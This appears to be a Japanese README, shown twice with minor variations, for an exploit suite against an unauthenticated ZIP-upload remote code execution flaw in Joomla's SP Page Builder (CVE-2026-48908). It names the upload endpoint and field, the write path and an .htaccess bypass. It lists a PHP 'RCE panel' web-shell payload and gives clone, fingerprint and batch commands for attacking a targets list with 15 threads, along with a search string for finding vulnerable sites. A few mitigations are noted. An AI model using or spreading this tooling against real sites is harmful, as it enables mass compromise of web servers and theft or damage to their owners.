
Joomla SP Page Builder (<=6.6.1) における未認証ZIPアップロードRCE、CVE-2026-48908 のPythonエクスプロイトスイート。フィンガープリンティング、バッチモード、RCEパネルペイロードを備える。
SP Page Builder (Joomla) — 認証不要のZIPアップロード → RCE
| 製品 | SP Page Builder — com_sppagebuilder (JoomShaper) |
| バージョン | ≤ 6.6.1 |
| 修正済み | 6.6.2+ — アップロードに管理者権限が必要に |
| 認証 | 認証不要 |
| ベクター | POST …&task=asset.uploadCustomIcon |
| フィールド | custom_icon (アイコンフォントZIP) |
| 書き込み先 | /media/com_sppagebuilder/assets/iconfont/<pack>/fonts/ |
| バイパス | .PHP + fonts/.htaccess |
/media/com_sppagebuilder/ → PHP実行を無効化.htaccess をブロックcustom_icon ZIP POSTのレート制限git clone https://github.com/winrarzipsexploit/CVE-2026-48908.git
cd CVE-2026-48908
pip install -r requirements.txt
| ファイル | 役割 |
|---|---|
winrarzips_brand.py | CMDバナー (by winrarzips) |
sppb48908_core.py | Exploitエンジン |
CVE-2026-48908-Suite.py | バッチ + 単一ターゲットCLI |
CVE-2026-48908.py | 単一ターゲットラッパー |
payloads/x7-panel.php | RCEパネル |
requirements.txt | 依存関係 |
❌ ターゲットリスト、スキャン結果、パネルURLはリポジトリに含まれていません。
python CVE-2026-48908-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-48908-Suite.py -u https://LAB-URL --yes
python CVE-2026-48908-Suite.py -f targets.txt --yes --threads 15
body="com_sppagebuilder"
patched_662_plus · upload_rejected · waf_cloudflare · sppb_html_no_json · upload_server_failed
SP Page Builder (Joomla) — 認証不要のZIPアップロード → RCE
| 製品 | SP Page Builder — com_sppagebuilder (JoomShaper) |
| 影響を受けるバージョン | ≤ 6.6.1 |
| 修正済み | 6.6.2+ — アップロードに管理者権限が必要 |
| 認証 | 認証不要 |
| ベクター | POST …&task=asset.uploadCustomIcon |
| フィールド | custom_icon (アイコンフォントZIP) |
| 書き込み先 | /media/com_sppagebuilder/assets/iconfont/<pack>/fonts/ |
| バイパス | .PHP + fonts/.htaccess |
/media/com_sppagebuilder/ 配下のPHP実行を無効化.htaccess によるPHP登録をブロックcustom_icon ZIPアップロードのレート制限git clone https://github.com/winrarzipsexploit/CVE-2026-48908.git
cd CVE-2026-48908
pip install -r requirements.txt
| ファイル | 役割 |
|---|---|
winrarzips_brand.py | CMDバナー (by winrarzips) |
sppb48908_core.py | Exploitコア |
CVE-2026-48908-Suite.py | バッチ + 単一ターゲットCLI |
CVE-2026-48908.py | 単一ターゲットラッパー |
payloads/x7-panel.php | RCEパネルペイロード |
requirements.txt | 依存関係 |
❌ ターゲットリスト、スキャン結果、稼働中のパネルURLは含まれていません。
python CVE-2026-48908-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-48908-Suite.py -u https://LAB-URL --yes
python CVE-2026-48908-Suite.py -f targets.txt --yes --threads 15
body="com_sppagebuilder"
patched_662_plus · upload_rejected · waf_cloudflare · sppb_html_no_json · upload_server_failed